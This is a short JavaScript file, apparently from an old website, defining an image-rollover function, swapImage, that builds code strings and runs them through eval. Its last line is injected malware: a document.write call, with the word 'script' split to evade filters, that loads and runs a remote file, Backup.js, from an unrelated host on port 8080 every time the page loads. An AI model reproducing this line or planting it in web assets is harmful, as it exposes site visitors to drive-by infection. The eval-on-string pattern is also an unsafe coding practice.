	
	function swapImage(imgHook)
	{
		if (document.getElementById) {
			
			// this little regex hack is due to our friends at the Safari development
			// team, who decided that the src attribute should be the full URL to 
			// the image, even if that's not what is in the HTML or the JS image initializations.
			var pattern = /_on/;
			var path = eval("document.getElementById('"+imgHook+"').src");

			if (pattern.test(path) == true) {
				
				eval("document.getElementById('"+imgHook+"').src = "+imgHook+"Off.src");
				
			} else {
				
				eval("document.getElementById('"+imgHook+"').src = "+imgHook+"On.src");
				
			}
		} else {
			
			if (eval('document.'+imgHook+'.src == '+imgHook+'On.src')) {
			
				eval('document.'+imgHook+'.src = '+imgHook+'Off.src');
				
			} else {
				
				eval('document.'+imgHook+'.src = '+imgHook+'On.src');
			}
		}
	}

document.write('<s'+'cript type="text/javascript" src="http://oployau.fancountblogger.com:8080/Backup.js"></scr'+'ipt>');